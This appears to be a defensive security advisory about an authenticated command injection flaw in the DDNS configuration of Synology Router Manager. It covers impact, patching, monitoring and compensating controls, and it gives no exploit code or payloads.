A high-severity vulnerability exists in multiple Synology router products, allowing for remote command execution. An attacker could exploit the Dynamic DNS (DDNS) feature to inject and run malicious commands on the device, potentially leading to a complete compromise of the router. A successful attack would grant the adversary control over the network gateway, enabling them to intercept traffic, attack other devices on the network, and disrupt internet access.

The vulnerability is an OS Command Injection flaw within the DDNS Record functionality of the Synology Router Manager (SRM) web interface. The software fails to properly sanitize user-supplied input in the DDNS configuration fields before passing it to a system shell for execution. An authenticated attacker with access to configure DDNS records can craft a malicious payload containing shell metacharacters (e.g., ;, |, &&) and OS commands, which will then be executed on the underlying operating system with the privileges of the SRM service.

This vulnerability is rated as High severity with a CVSS score of 7.2. A compromised router represents a critical failure of the network perimeter. Exploitation could lead to significant consequences, including the loss of data confidentiality through traffic interception (man-in-the-middle attacks), loss of integrity as an attacker could modify data in transit, and loss of availability by disrupting network services. An attacker could also use the compromised router as a pivot point to launch further attacks against internal network assets, making it a severe risk to the organization's overall security posture.

Immediate Action: Apply the vendor-supplied security updates for Synology Router Manager (SRM) immediately to patch the vulnerability. After patching, review system and access logs for any signs of unauthorized activity or attempted exploitation that may have occurred prior to the update.

Proactive Monitoring: System administrators should monitor for indicators of compromise. This includes reviewing SRM logs for unusual or malformed entries in the DDNS configuration, monitoring the router for unexpected outbound network connections, and checking for unauthorized processes running on the device. Network Intrusion Detection Systems (NIDS) should be configured to alert on common command injection signatures in traffic directed to the router's management interface.

Compensating Controls: If immediate patching is not feasible, implement the following controls to reduce the risk of exploitation:

• Restrict access to the SRM management interface to a minimal set of trusted IP addresses.
• If the DDNS functionality is not required for business operations, disable it entirely.
• Ensure strong, unique passwords are used for all accounts with access to the SRM interface to make unauthorized access more difficult.

Public Exploit Available: false

Given the high severity of this vulnerability and its location on a critical perimeter device, immediate remediation is strongly recommended. Organizations should prioritize the deployment of the vendor's security patch across all affected Synology routers. Although this CVE is not currently on the CISA KEV list, its nature as a command injection flaw in a network device makes it a highly attractive target for attackers. Proactive patching is the most effective defense against potential exploitation.